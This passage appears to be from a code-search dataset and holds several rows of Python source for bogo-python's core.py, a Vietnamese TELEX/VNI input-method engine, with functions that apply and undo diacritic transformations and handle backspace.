trans_list.
"""
comps = list(comps)
accent_list = list(map(accent.get_accent_char, comps[1]))
mark_list = list(map(mark.get_mark_char, utils.join(comps)))
action_list = list(map(lambda x: _get_action(x), trans_list))
def atomic_check(action):
"""
Check if the `action` created one of the marks, accents, or characters
in `comps`.
"""
return (action[0] == _Action.ADD_ACCENT and action[1] in accent_list) \
or (action[0] == _Action.ADD_MARK and action[1] in mark_list) \
or (action[0] == _Action.ADD_CHAR and action[1] == \
accent.remove_accent_char(comps[1][-1])) # ơ, ư
return any(map(atomic_check, action_list))
def handle_backspace(converted_string, raw_sequence, im_rules=None):
"""
Returns a new raw_sequence after a backspace. This raw_sequence should
be pushed back to process_sequence().
"""
# I can't find a simple explanation for this, so
# I hope this example can help clarify it:
#
# handle_backspace(thương, thuwongw) -> thuwonw
# handle_backspace(thươn, thuwonw) -> thuwow
# handle_backspace(thươ, thuwow) -> thuw
# handle_backspace(thươ, thuw) -> th
#
# The algorithm for handle_backspace was contributed by @hainp.
if im_rules == None:
im_rules = get_telex_definition()
deleted_char = converted_string[-1]
_accent = accent.get_accent_char(deleted_char)
_mark = mark.get_mark_char(deleted_char)
if _mark or _accent:
# Find a sequence of IM keys at the end of
# raw_sequence
ime_keys_at_end = ""
len_raw_sequence = len(raw_sequence)
i = len_raw_sequence - 1
while i >= 0:
if raw_sequence[i] not in im_rules and \
raw_sequence[i] not in "aeiouyd":
i += 1
break
else:
ime_keys_at_end = raw_sequence[i] + ime_keys_at_end
i -= 1
# Try to find a subsequence from that sequence
# that can be converted to the deleted_char
k = 0
while k < len_raw_sequence:
if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
# Delete that subsequence
raw_sequence = raw_sequence[:i + k]
break
k += 1
else:
index = raw_sequence.rfind(deleted_char)
raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | _transform | python | def _transform(comps, trans):
logging.debug("== In _transform(%s, %s) ==", comps, trans)
components = list(comps)
action, parameter = _get_action(trans)
if action == _Action.ADD_MARK and \
components[2] == "" and \
mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
action, parameter = _Action.ADD_CHAR, trans[0]
if action == _Action.ADD_ACCENT:
logging.debug("add_accent(%s, %s)", components, parameter)
components = accent.add_accent(components, parameter)
elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
logging.debug("add_mark(%s, %s)", components, parameter)
components = mark.add_mark(components, parameter)
# Handle uơ in "huơ", "thuở", "quở"
# If the current word has no last consonant and the first consonant
# is one of "h", "th" and the vowel is "ươ" then change the vowel into
# "uơ", keeping case and accent. If an alphabet character is then added
# into the word then change back to "ươ".
#
# NOTE: In the dictionary, these are the only words having this strange
# vowel so we don't need to worry about other cases.
if accent.remove_accent_string(components[1]).lower() == "ươ" and \
not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
# Backup accents
ac = accent.get_accent_string(components[1])
components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
components = accent.add_accent(components, ac)
elif action == _Action.ADD_CHAR:
if trans[0] == "<":
if not components[2]:
# Only allow ư, ơ or ươ sitting alone in the middle part
# and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
# will create ['g', 'i', '']. Therefore we have to allow
# components[1] == 'i'.
if (components[0].lower(), components[1].lower()) == ('g', 'i'):
components[0] += components[1]
components[1] = ''
if not components[1] or \
(components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
components[1] += trans[1]
else:
components = utils.append_comps(components, parameter)
if parameter.isalpha() and \
accent.remove_accent_string(components[1]).lower().startswith("uơ"):
ac = accent.get_accent_string(components[1])
components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
components = accent.add_accent(components, ac)
elif action == _Action.UNDO:
components = _reverse(components, trans[1:])
if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
# If there is any accent, remove and reapply it
# because it is likely to be misplaced in previous transformations
ac = accent.get_accent_string(components[1])
if ac != accent.Accent.NONE:
components = accent.add_accent(components, Accent.NONE)
components = accent.add_accent(components, ac)
logging.debug("After transform: %s", components)
return components | Transform the given string with transform type trans | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L365-L434 | [
"def strip(string):\n \"\"\"\n Strip a string of all marks and accents.\n \"\"\"\n return remove_mark_string(accent.remove_accent_string(string))\n",
"def get_accent_string(string):\n \"\"\"\n Get the first accent from the right of a string.\n \"\"\"\n accents = list(filter(lambda accent: ... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
"""Create a definition dictionary for the TELEX input method
Args:
w_shorthand (optional): allow a stand-alone w to be
interpreted as an ư. Default to True.
brackets_shorthand (optional, True): allow typing ][ as
shorthand for ươ. Default to True.
Returns a dictionary to be passed into process_key().
"""
telex = {
"a": "a^",
"o": "o^",
"e": "e^",
"w": ["u*", "o*", "a+"],
"d": "d-",
"f": "\\",
"s": "/",
"r": "?",
"x": "~",
"j": ".",
}
if w_shorthand:
telex["w"].append('<ư')
if brackets_shorthand:
telex.update({
"]": "<ư",
"[": "<ơ",
"}": "<Ư",
"{": "<Ơ"
})
return telex
def get_vni_definition():
"""Create a definition dictionary for the VNI input method.
Returns a dictionary to be passed into process_key().
"""
return {
"6": ["a^", "o^", "e^"],
"7": ["u*", "o*"],
"8": "a+",
"9": "d-",
"2": "\\",
"1": "/",
"3": "?",
"4": "~",
"5": "."
}
def _accepted_chars(rules):
if sys.version_info[0] > 2:
ascii_letters = \
string.ascii_letters
else:
ascii_letters = \
string.lowercase + \
string.uppercase
return set(ascii_letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_sequence(sequence,
rules=None,
skip_non_vietnamese=True):
"""\
Convert a key sequence into a Vietnamese string with diacritical marks.
Args:
rules (optional): see docstring for process_key().
skip_non_vietnamese (optional): see docstring for process_key().
It even supports continous key sequences connected by separators.
i.e. process_sequence('con meof.ddieen') should work.
"""
result = ""
raw = result
result_parts = []
if rules is None:
rules = get_telex_definition()
accepted_chars = _accepted_chars(rules)
for key in sequence:
if key not in accepted_chars:
result_parts.append(result)
result_parts.append(key)
result = ""
raw = ""
else:
result, raw = process_key(
string=result,
key=key,
fallback_sequence=raw,
rules=rules,
skip_non_vietnamese=skip_non_vietnamese)
result_parts.append(result)
return ''.join(result_parts)
def process_key(string, key,
fallback_sequence="", rules=None,
skip_non_vietnamese=True):
"""Process a keystroke.
Args:
string: The previously processed string or "".
key: The keystroke.
fallback_sequence: The previous keystrokes.
rules (optional): A dictionary listing
transformation rules. Defaults to get_telex_definition().
skip_non_vietnamese (optional): Whether to skip results that
doesn't seem like Vietnamese. Defaults to True.
Returns a tuple. The first item of which is the processed
Vietnamese string, the second item is the next fallback sequence.
The two items are to be fed back into the next call of process_key()
as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
True and the resulting string doesn't look like Vietnamese,
both items contain the `fallback_sequence`.
>>> process_key('a', 'a', 'a')
(â, aa)
Note that when a key is an undo key, it won't get appended to
`fallback_sequence`.
>>> process_key('â', 'a', 'aa')
(aa, aa)
`rules` is a dictionary that maps keystrokes to
their effect string. The effects can be one of the following:
'a^': a with circumflex (â), only affect an existing 'a family'
'a+': a with breve (ă), only affect an existing 'a family'
'e^': e with circumflex (ê), only affect an existing 'e family'
'o^': o with circumflex (ô), only affect an existing 'o family'
'o*': o with horn (ơ), only affect an existing 'o family'
'd-': d with bar (đ), only affect an existing 'd'
'/': acute (sắc), affect an existing vowel
'\': grave (huyền), affect an existing vowel
'?': hook (hỏi), affect an existing vowel
'~': tilde (ngã), affect an existing vowel
'.': dot (nặng), affect an existing vowel
'<ư': append ư
'<ơ': append ơ
A keystroke entry can have multiple effects, in which case the
dictionary entry's value should be a list of the possible
effect strings. Although you should try to avoid this if
you are defining a custom input method rule.
"""
# TODO Figure out a way to remove the `string` argument. Perhaps only the
# key sequence is needed?
def default_return():
return string + key, fallback_sequence + key
if rules is None:
rules = get_telex_definition()
comps = utils.separate(string)
# if not _is_processable(comps):
# return default_return()
# Find all possible transformations this keypress can generate
trans_list = _get_transformation_list(
key, rules, fallback_sequence)
# Then apply them one by one
new_comps = list(comps)
for trans in trans_list:
new_comps = _transform(new_comps, trans)
if new_comps == comps:
tmp = list(new_comps)
# If none of the transformations (if any) work
# then this keystroke is probably an undo key.
if _can_undo(new_comps, trans_list):
# The prefix "_" means undo.
for trans in map(lambda x: "_" + x, trans_list):
new_comps = _transform(new_comps, trans)
# Undoing the w key with the TELEX input method with the
# w:<ư extension requires some care.
#
# The input (ư, w) should be undone as w
# on the other hand, (ư, uw) should return uw.
#
# _transform() is not aware of the 2 ways to generate
# ư in TELEX and always think ư was created by uw.
# Therefore, after calling _transform() to undo ư,
# we always get ['', 'u', ''].
#
# So we have to clean it up a bit.
def is_telex_like():
return '<ư' in rules["w"]
def undone_vowel_ends_with_u():
return new_comps[1] and new_comps[1][-1].lower() == "u"
def not_first_key_press():
return len(fallback_sequence) >= 1
def user_typed_ww():
return (fallback_sequence[-1:]+key).lower() == "ww"
def user_didnt_type_uww():
return not (len(fallback_sequence) >= 2 and
fallback_sequence[-2].lower() == "u")
if is_telex_like() and \
not_first_key_press() and \
undone_vowel_ends_with_u() and \
user_typed_ww() and \
user_didnt_type_uww():
# The vowel part of new_comps is supposed to end with
# u now. That u should be removed.
new_comps[1] = new_comps[1][:-1]
if tmp == new_comps:
fallback_sequence += key
new_comps = utils.append_comps(new_comps, key)
else:
fallback_sequence += key
if skip_non_vietnamese is True and key.isalpha() and \
not is_valid_combination(new_comps, final_form=False):
result = fallback_sequence, fallback_sequence
else:
result = utils.join(new_comps), fallback_sequence
return result
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _get_action(trans):
"""
Return the action inferred from the transformation `trans`.
and the parameter going with this action
An _Action.ADD_MARK goes with a Mark
while an _Action.ADD_ACCENT goes with an Accent
"""
# TODO: VIQR-like convention
mark_action = {
'^': (_Action.ADD_MARK, Mark.HAT),
'+': (_Action.ADD_MARK, Mark.BREVE),
'*': (_Action.ADD_MARK, Mark.HORN),
'-': (_Action.ADD_MARK, Mark.BAR),
}
accent_action = {
'\\': (_Action.ADD_ACCENT, Accent.GRAVE),
'/': (_Action.ADD_ACCENT, Accent.ACUTE),
'?': (_Action.ADD_ACCENT, Accent.HOOK),
'~': (_Action.ADD_ACCENT, Accent.TIDLE),
'.': (_Action.ADD_ACCENT, Accent.DOT),
}
if trans[0] in ('<', '+'):
return _Action.ADD_CHAR, trans[1]
if trans[0] == "_":
return _Action.UNDO, trans[1:]
if len(trans) == 2:
return mark_action[trans[1]]
else:
return accent_action[trans[0]]
def _reverse(components, trans):
"""
Reverse the effect of transformation 'trans' on 'components'
If the transformation does not affect the components, return the original
string.
"""
action, parameter = _get_action(trans)
comps = list(components)
string = utils.join(comps)
if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
if comps[2]:
i = 2
elif comps[1]:
i = 1
else:
i = 0
comps[i] = comps[i][:-1]
elif action == _Action.ADD_ACCENT:
comps = accent.add_accent(comps, Accent.NONE)
elif action == _Action.ADD_MARK:
if parameter == Mark.BAR:
comps[0] = comps[0][:-1] + \
mark.add_mark_char(comps[0][-1:], Mark.NONE)
else:
if mark.is_valid_mark(comps, trans):
comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
for c in comps[1]])
return comps
def _can_undo(comps, trans_list):
"""
Return whether a components can be undone with one of the transformation in
trans_list.
"""
comps = list(comps)
accent_list = list(map(accent.get_accent_char, comps[1]))
mark_list = list(map(mark.get_mark_char, utils.join(comps)))
action_list = list(map(lambda x: _get_action(x), trans_list))
def atomic_check(action):
"""
Check if the `action` created one of the marks, accents, or characters
in `comps`.
"""
return (action[0] == _Action.ADD_ACCENT and action[1] in accent_list) \
or (action[0] == _Action.ADD_MARK and action[1] in mark_list) \
or (action[0] == _Action.ADD_CHAR and action[1] == \
accent.remove_accent_char(comps[1][-1])) # ơ, ư
return any(map(atomic_check, action_list))
def handle_backspace(converted_string, raw_sequence, im_rules=None):
"""
Returns a new raw_sequence after a backspace. This raw_sequence should
be pushed back to process_sequence().
"""
# I can't find a simple explanation for this, so
# I hope this example can help clarify it:
#
# handle_backspace(thương, thuwongw) -> thuwonw
# handle_backspace(thươn, thuwonw) -> thuwow
# handle_backspace(thươ, thuwow) -> thuw
# handle_backspace(thươ, thuw) -> th
#
# The algorithm for handle_backspace was contributed by @hainp.
if im_rules == None:
im_rules = get_telex_definition()
deleted_char = converted_string[-1]
_accent = accent.get_accent_char(deleted_char)
_mark = mark.get_mark_char(deleted_char)
if _mark or _accent:
# Find a sequence of IM keys at the end of
# raw_sequence
ime_keys_at_end = ""
len_raw_sequence = len(raw_sequence)
i = len_raw_sequence - 1
while i >= 0:
if raw_sequence[i] not in im_rules and \
raw_sequence[i] not in "aeiouyd":
i += 1
break
else:
ime_keys_at_end = raw_sequence[i] + ime_keys_at_end
i -= 1
# Try to find a subsequence from that sequence
# that can be converted to the deleted_char
k = 0
while k < len_raw_sequence:
if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
# Delete that subsequence
raw_sequence = raw_sequence[:i + k]
break
k += 1
else:
index = raw_sequence.rfind(deleted_char)
raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | _reverse | python | def _reverse(components, trans):
action, parameter = _get_action(trans)
comps = list(components)
string = utils.join(comps)
if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
if comps[2]:
i = 2
elif comps[1]:
i = 1
else:
i = 0
comps[i] = comps[i][:-1]
elif action == _Action.ADD_ACCENT:
comps = accent.add_accent(comps, Accent.NONE)
elif action == _Action.ADD_MARK:
if parameter == Mark.BAR:
comps[0] = comps[0][:-1] + \
mark.add_mark_char(comps[0][-1:], Mark.NONE)
else:
if mark.is_valid_mark(comps, trans):
comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
for c in comps[1]])
return comps | Reverse the effect of transformation 'trans' on 'components'
If the transformation does not affect the components, return the original
string. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L437-L466 | null | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
"""Create a definition dictionary for the TELEX input method
Args:
w_shorthand (optional): allow a stand-alone w to be
interpreted as an ư. Default to True.
brackets_shorthand (optional, True): allow typing ][ as
shorthand for ươ. Default to True.
Returns a dictionary to be passed into process_key().
"""
telex = {
"a": "a^",
"o": "o^",
"e": "e^",
"w": ["u*", "o*", "a+"],
"d": "d-",
"f": "\\",
"s": "/",
"r": "?",
"x": "~",
"j": ".",
}
if w_shorthand:
telex["w"].append('<ư')
if brackets_shorthand:
telex.update({
"]": "<ư",
"[": "<ơ",
"}": "<Ư",
"{": "<Ơ"
})
return telex
def get_vni_definition():
"""Create a definition dictionary for the VNI input method.
Returns a dictionary to be passed into process_key().
"""
return {
"6": ["a^", "o^", "e^"],
"7": ["u*", "o*"],
"8": "a+",
"9": "d-",
"2": "\\",
"1": "/",
"3": "?",
"4": "~",
"5": "."
}
def _accepted_chars(rules):
if sys.version_info[0] > 2:
ascii_letters = \
string.ascii_letters
else:
ascii_letters = \
string.lowercase + \
string.uppercase
return set(ascii_letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_sequence(sequence,
rules=None,
skip_non_vietnamese=True):
"""\
Convert a key sequence into a Vietnamese string with diacritical marks.
Args:
rules (optional): see docstring for process_key().
skip_non_vietnamese (optional): see docstring for process_key().
It even supports continous key sequences connected by separators.
i.e. process_sequence('con meof.ddieen') should work.
"""
result = ""
raw = result
result_parts = []
if rules is None:
rules = get_telex_definition()
accepted_chars = _accepted_chars(rules)
for key in sequence:
if key not in accepted_chars:
result_parts.append(result)
result_parts.append(key)
result = ""
raw = ""
else:
result, raw = process_key(
string=result,
key=key,
fallback_sequence=raw,
rules=rules,
skip_non_vietnamese=skip_non_vietnamese)
result_parts.append(result)
return ''.join(result_parts)
def process_key(string, key,
fallback_sequence="", rules=None,
skip_non_vietnamese=True):
"""Process a keystroke.
Args:
string: The previously processed string or "".
key: The keystroke.
fallback_sequence: The previous keystrokes.
rules (optional): A dictionary listing
transformation rules. Defaults to get_telex_definition().
skip_non_vietnamese (optional): Whether to skip results that
doesn't seem like Vietnamese. Defaults to True.
Returns a tuple. The first item of which is the processed
Vietnamese string, the second item is the next fallback sequence.
The two items are to be fed back into the next call of process_key()
as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
True and the resulting string doesn't look like Vietnamese,
both items contain the `fallback_sequence`.
>>> process_key('a', 'a', 'a')
(â, aa)
Note that when a key is an undo key, it won't get appended to
`fallback_sequence`.
>>> process_key('â', 'a', 'aa')
(aa, aa)
`rules` is a dictionary that maps keystrokes to
their effect string. The effects can be one of the following:
'a^': a with circumflex (â), only affect an existing 'a family'
'a+': a with breve (ă), only affect an existing 'a family'
'e^': e with circumflex (ê), only affect an existing 'e family'
'o^': o with circumflex (ô), only affect an existing 'o family'
'o*': o with horn (ơ), only affect an existing 'o family'
'd-': d with bar (đ), only affect an existing 'd'
'/': acute (sắc), affect an existing vowel
'\': grave (huyền), affect an existing vowel
'?': hook (hỏi), affect an existing vowel
'~': tilde (ngã), affect an existing vowel
'.': dot (nặng), affect an existing vowel
'<ư': append ư
'<ơ': append ơ
A keystroke entry can have multiple effects, in which case the
dictionary entry's value should be a list of the possible
effect strings. Although you should try to avoid this if
you are defining a custom input method rule.
"""
# TODO Figure out a way to remove the `string` argument. Perhaps only the
# key sequence is needed?
def default_return():
return string + key, fallback_sequence + key
if rules is None:
rules = get_telex_definition()
comps = utils.separate(string)
# if not _is_processable(comps):
# return default_return()
# Find all possible transformations this keypress can generate
trans_list = _get_transformation_list(
key, rules, fallback_sequence)
# Then apply them one by one
new_comps = list(comps)
for trans in trans_list:
new_comps = _transform(new_comps, trans)
if new_comps == comps:
tmp = list(new_comps)
# If none of the transformations (if any) work
# then this keystroke is probably an undo key.
if _can_undo(new_comps, trans_list):
# The prefix "_" means undo.
for trans in map(lambda x: "_" + x, trans_list):
new_comps = _transform(new_comps, trans)
# Undoing the w key with the TELEX input method with the
# w:<ư extension requires some care.
#
# The input (ư, w) should be undone as w
# on the other hand, (ư, uw) should return uw.
#
# _transform() is not aware of the 2 ways to generate
# ư in TELEX and always think ư was created by uw.
# Therefore, after calling _transform() to undo ư,
# we always get ['', 'u', ''].
#
# So we have to clean it up a bit.
def is_telex_like():
return '<ư' in rules["w"]
def undone_vowel_ends_with_u():
return new_comps[1] and new_comps[1][-1].lower() == "u"
def not_first_key_press():
return len(fallback_sequence) >= 1
def user_typed_ww():
return (fallback_sequence[-1:]+key).lower() == "ww"
def user_didnt_type_uww():
return not (len(fallback_sequence) >= 2 and
fallback_sequence[-2].lower() == "u")
if is_telex_like() and \
not_first_key_press() and \
undone_vowel_ends_with_u() and \
user_typed_ww() and \
user_didnt_type_uww():
# The vowel part of new_comps is supposed to end with
# u now. That u should be removed.
new_comps[1] = new_comps[1][:-1]
if tmp == new_comps:
fallback_sequence += key
new_comps = utils.append_comps(new_comps, key)
else:
fallback_sequence += key
if skip_non_vietnamese is True and key.isalpha() and \
not is_valid_combination(new_comps, final_form=False):
result = fallback_sequence, fallback_sequence
else:
result = utils.join(new_comps), fallback_sequence
return result
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _get_action(trans):
"""
Return the action inferred from the transformation `trans`.
and the parameter going with this action
An _Action.ADD_MARK goes with a Mark
while an _Action.ADD_ACCENT goes with an Accent
"""
# TODO: VIQR-like convention
mark_action = {
'^': (_Action.ADD_MARK, Mark.HAT),
'+': (_Action.ADD_MARK, Mark.BREVE),
'*': (_Action.ADD_MARK, Mark.HORN),
'-': (_Action.ADD_MARK, Mark.BAR),
}
accent_action = {
'\\': (_Action.ADD_ACCENT, Accent.GRAVE),
'/': (_Action.ADD_ACCENT, Accent.ACUTE),
'?': (_Action.ADD_ACCENT, Accent.HOOK),
'~': (_Action.ADD_ACCENT, Accent.TIDLE),
'.': (_Action.ADD_ACCENT, Accent.DOT),
}
if trans[0] in ('<', '+'):
return _Action.ADD_CHAR, trans[1]
if trans[0] == "_":
return _Action.UNDO, trans[1:]
if len(trans) == 2:
return mark_action[trans[1]]
else:
return accent_action[trans[0]]
def _transform(comps, trans):
"""
Transform the given string with transform type trans
"""
logging.debug("== In _transform(%s, %s) ==", comps, trans)
components = list(comps)
action, parameter = _get_action(trans)
if action == _Action.ADD_MARK and \
components[2] == "" and \
mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
action, parameter = _Action.ADD_CHAR, trans[0]
if action == _Action.ADD_ACCENT:
logging.debug("add_accent(%s, %s)", components, parameter)
components = accent.add_accent(components, parameter)
elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
logging.debug("add_mark(%s, %s)", components, parameter)
components = mark.add_mark(components, parameter)
# Handle uơ in "huơ", "thuở", "quở"
# If the current word has no last consonant and the first consonant
# is one of "h", "th" and the vowel is "ươ" then change the vowel into
# "uơ", keeping case and accent. If an alphabet character is then added
# into the word then change back to "ươ".
#
# NOTE: In the dictionary, these are the only words having this strange
# vowel so we don't need to worry about other cases.
if accent.remove_accent_string(components[1]).lower() == "ươ" and \
not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
# Backup accents
ac = accent.get_accent_string(components[1])
components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
components = accent.add_accent(components, ac)
elif action == _Action.ADD_CHAR:
if trans[0] == "<":
if not components[2]:
# Only allow ư, ơ or ươ sitting alone in the middle part
# and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
# will create ['g', 'i', '']. Therefore we have to allow
# components[1] == 'i'.
if (components[0].lower(), components[1].lower()) == ('g', 'i'):
components[0] += components[1]
components[1] = ''
if not components[1] or \
(components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
components[1] += trans[1]
else:
components = utils.append_comps(components, parameter)
if parameter.isalpha() and \
accent.remove_accent_string(components[1]).lower().startswith("uơ"):
ac = accent.get_accent_string(components[1])
components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
components = accent.add_accent(components, ac)
elif action == _Action.UNDO:
components = _reverse(components, trans[1:])
if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
# If there is any accent, remove and reapply it
# because it is likely to be misplaced in previous transformations
ac = accent.get_accent_string(components[1])
if ac != accent.Accent.NONE:
components = accent.add_accent(components, Accent.NONE)
components = accent.add_accent(components, ac)
logging.debug("After transform: %s", components)
return components
def _can_undo(comps, trans_list):
"""
Return whether a components can be undone with one of the transformation in
trans_list.
"""
comps = list(comps)
accent_list = list(map(accent.get_accent_char, comps[1]))
mark_list = list(map(mark.get_mark_char, utils.join(comps)))
action_list = list(map(lambda x: _get_action(x), trans_list))
def atomic_check(action):
"""
Check if the `action` created one of the marks, accents, or characters
in `comps`.
"""
return (action[0] == _Action.ADD_ACCENT and action[1] in accent_list) \
or (action[0] == _Action.ADD_MARK and action[1] in mark_list) \
or (action[0] == _Action.ADD_CHAR and action[1] == \
accent.remove_accent_char(comps[1][-1])) # ơ, ư
return any(map(atomic_check, action_list))
def handle_backspace(converted_string, raw_sequence, im_rules=None):
"""
Returns a new raw_sequence after a backspace. This raw_sequence should
be pushed back to process_sequence().
"""
# I can't find a simple explanation for this, so
# I hope this example can help clarify it:
#
# handle_backspace(thương, thuwongw) -> thuwonw
# handle_backspace(thươn, thuwonw) -> thuwow
# handle_backspace(thươ, thuwow) -> thuw
# handle_backspace(thươ, thuw) -> th
#
# The algorithm for handle_backspace was contributed by @hainp.
if im_rules == None:
im_rules = get_telex_definition()
deleted_char = converted_string[-1]
_accent = accent.get_accent_char(deleted_char)
_mark = mark.get_mark_char(deleted_char)
if _mark or _accent:
# Find a sequence of IM keys at the end of
# raw_sequence
ime_keys_at_end = ""
len_raw_sequence = len(raw_sequence)
i = len_raw_sequence - 1
while i >= 0:
if raw_sequence[i] not in im_rules and \
raw_sequence[i] not in "aeiouyd":
i += 1
break
else:
ime_keys_at_end = raw_sequence[i] + ime_keys_at_end
i -= 1
# Try to find a subsequence from that sequence
# that can be converted to the deleted_char
k = 0
while k < len_raw_sequence:
if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
# Delete that subsequence
raw_sequence = raw_sequence[:i + k]
break
k += 1
else:
index = raw_sequence.rfind(deleted_char)
raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | _can_undo | python | def _can_undo(comps, trans_list):
comps = list(comps)
accent_list = list(map(accent.get_accent_char, comps[1]))
mark_list = list(map(mark.get_mark_char, utils.join(comps)))
action_list = list(map(lambda x: _get_action(x), trans_list))
def atomic_check(action):
"""
Check if the `action` created one of the marks, accents, or characters
in `comps`.
"""
return (action[0] == _Action.ADD_ACCENT and action[1] in accent_list) \
or (action[0] == _Action.ADD_MARK and action[1] in mark_list) \
or (action[0] == _Action.ADD_CHAR and action[1] == \
accent.remove_accent_char(comps[1][-1])) # ơ, ư
return any(map(atomic_check, action_list)) | Return whether a components can be undone with one of the transformation in
trans_list. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L469-L489 | [
"def join(alist):\n return \"\".join(alist)\n"
] | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
